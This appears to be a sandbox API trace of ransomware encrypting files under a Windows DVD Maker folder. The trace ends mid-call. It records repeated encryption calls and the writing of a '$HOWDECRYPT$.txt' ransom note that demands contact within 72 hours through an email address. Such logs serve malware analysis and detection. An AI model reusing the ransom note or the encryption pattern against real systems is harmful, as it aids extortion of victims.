[0093.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0093.236] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc20 | out: pbBuffer=0x57fc20) returned 1 [0093.236] GetProcessHeap () returned 0x2c0000 [0093.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.236] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc18*=0x30) returned 1 [0093.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.237] GetProcessHeap () returned 0x2c0000 [0093.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.237] GetProcessHeap () returned 0x2c0000 [0093.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0093.237] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc20 | out: pbBuffer=0x57fc20) returned 1 [0093.237] GetProcessHeap () returned 0x2c0000 [0093.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.237] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc18*=0x30) returned 1 [0093.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.270] GetProcessHeap () returned 0x2c0000 [0093.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.270] GetProcessHeap () returned 0x2c0000 [0093.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377f08 | out: hHeap=0x2c0000) returned 1 [0093.270] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc18 | out: pbBuffer=0x57fc18) returned 1 [0093.270] GetProcessHeap () returned 0x2c0000 [0093.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.270] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc10*=0x30) returned 1 [0093.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.270] GetProcessHeap () returned 0x2c0000 [0093.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.270] GetProcessHeap () returned 0x2c0000 [0093.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0093.271] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc18 | out: pbBuffer=0x57fc18) returned 1 [0093.271] GetProcessHeap () returned 0x2c0000 [0093.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.271] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc10*=0x30) returned 1 [0093.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.271] GetProcessHeap () returned 0x2c0000 [0093.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.271] GetProcessHeap () returned 0x2c0000 [0093.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0093.271] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc10 | out: pbBuffer=0x57fc10) returned 1 [0093.271] GetProcessHeap () returned 0x2c0000 [0093.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.271] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc08*=0x30) returned 1 [0093.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\goldring.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.271] GetProcessHeap () returned 0x2c0000 [0093.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.271] GetProcessHeap () returned 0x2c0000 [0093.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0093.272] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc10 | out: pbBuffer=0x57fc10) returned 1 [0093.272] GetProcessHeap () returned 0x2c0000 [0093.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.272] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc08*=0x30) returned 1 [0093.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\circlesubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.272] GetProcessHeap () returned 0x2c0000 [0093.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.272] GetProcessHeap () returned 0x2c0000 [0093.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346488 | out: hHeap=0x2c0000) returned 1 [0093.272] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc08 | out: pbBuffer=0x57fc08) returned 1 [0093.272] GetProcessHeap () returned 0x2c0000 [0093.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.272] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc00*=0x30) returned 1 [0093.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.272] GetProcessHeap () returned 0x2c0000 [0093.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.273] GetProcessHeap () returned 0x2c0000 [0093.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37ba48 | out: hHeap=0x2c0000) returned 1 [0093.273] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc08 | out: pbBuffer=0x57fc08) returned 1 [0093.273] GetProcessHeap () returned 0x2c0000 [0093.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.273] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fc00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fc00*=0x30) returned 1 [0093.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.273] GetProcessHeap () returned 0x2c0000 [0093.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.273] GetProcessHeap () returned 0x2c0000 [0093.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383a98 | out: hHeap=0x2c0000) returned 1 [0093.273] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc00 | out: pbBuffer=0x57fc00) returned 1 [0093.273] GetProcessHeap () returned 0x2c0000 [0093.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.273] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbf8*=0x30) returned 1 [0093.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.273] GetProcessHeap () returned 0x2c0000 [0093.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.274] GetProcessHeap () returned 0x2c0000 [0093.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b480 | out: hHeap=0x2c0000) returned 1 [0093.274] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fc00 | out: pbBuffer=0x57fc00) returned 1 [0093.274] GetProcessHeap () returned 0x2c0000 [0093.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.274] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbf8*=0x30) returned 1 [0093.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.305] GetProcessHeap () returned 0x2c0000 [0093.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.305] GetProcessHeap () returned 0x2c0000 [0093.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383980 | out: hHeap=0x2c0000) returned 1 [0093.305] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbf8 | out: pbBuffer=0x57fbf8) returned 1 [0093.305] GetProcessHeap () returned 0x2c0000 [0093.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.305] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbf0*=0x30) returned 1 [0093.305] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.305] GetProcessHeap () returned 0x2c0000 [0093.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.305] GetProcessHeap () returned 0x2c0000 [0093.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378478 | out: hHeap=0x2c0000) returned 1 [0093.306] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0093.307] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.307] WriteFile (in: hFile=0x174, lpBuffer=0x57fb2b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fc54, lpOverlapped=0x0 | out: lpBuffer=0x57fb2b*, lpNumberOfBytesWritten=0x57fc54*=0x127, lpOverlapped=0x0) returned 1 [0093.308] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.308] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fc54, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fc54*=0x2ac, lpOverlapped=0x0) returned 1 [0093.308] CloseHandle (hObject=0x174) returned 1 [0093.308] GetProcessHeap () returned 0x2c0000 [0093.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0093.308] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbf0 | out: pbBuffer=0x57fbf0) returned 1 [0093.309] GetProcessHeap () returned 0x2c0000 [0093.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.309] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbe8*=0x30) returned 1 [0093.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.311] GetProcessHeap () returned 0x2c0000 [0093.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.311] GetProcessHeap () returned 0x2c0000 [0093.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0093.311] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbf0 | out: pbBuffer=0x57fbf0) returned 1 [0093.311] GetProcessHeap () returned 0x2c0000 [0093.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.311] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbe8*=0x30) returned 1 [0093.311] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.322] GetProcessHeap () returned 0x2c0000 [0093.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.322] GetProcessHeap () returned 0x2c0000 [0093.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0093.322] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbe8 | out: pbBuffer=0x57fbe8) returned 1 [0093.322] GetProcessHeap () returned 0x2c0000 [0093.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.322] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbe0*=0x30) returned 1 [0093.322] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\play-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.325] GetProcessHeap () returned 0x2c0000 [0093.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.325] GetProcessHeap () returned 0x2c0000 [0093.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346568 | out: hHeap=0x2c0000) returned 1 [0093.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbe8 | out: pbBuffer=0x57fbe8) returned 1 [0093.325] GetProcessHeap () returned 0x2c0000 [0093.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.325] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbe0*=0x30) returned 1 [0093.326] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.328] GetProcessHeap () returned 0x2c0000 [0093.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.328] GetProcessHeap () returned 0x2c0000 [0093.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346c68 | out: hHeap=0x2c0000) returned 1 [0093.329] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbe0 | out: pbBuffer=0x57fbe0) returned 1 [0093.329] GetProcessHeap () returned 0x2c0000 [0093.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.329] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbd8*=0x30) returned 1 [0093.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.331] GetProcessHeap () returned 0x2c0000 [0093.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.332] GetProcessHeap () returned 0x2c0000 [0093.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0093.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbe0 | out: pbBuffer=0x57fbe0) returned 1 [0093.332] GetProcessHeap () returned 0x2c0000 [0093.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbd8*=0x30) returned 1 [0093.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-bullet.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.335] GetProcessHeap () returned 0x2c0000 [0093.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.335] GetProcessHeap () returned 0x2c0000 [0093.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0093.335] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbd8 | out: pbBuffer=0x57fbd8) returned 1 [0093.335] GetProcessHeap () returned 0x2c0000 [0093.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.336] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbd0*=0x30) returned 1 [0093.336] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-image-inset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.344] GetProcessHeap () returned 0x2c0000 [0093.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.344] GetProcessHeap () returned 0x2c0000 [0093.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ee78 | out: hHeap=0x2c0000) returned 1 [0093.344] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fbd8 | out: pbBuffer=0x57fbd8) returned 1 [0093.344] GetProcessHeap () returned 0x2c0000 [0093.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.344] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fbd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fbd0*=0x30) returned 1 [0093.344] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\shatter.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.356] GetProcessHeap () returned 0x2c0000 [0093.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.356] GetProcessHeap () returned 0x2c0000 [0093.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358060 | out: hHeap=0x2c0000) returned 1 [0093.356] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0093.356] lstrlenA 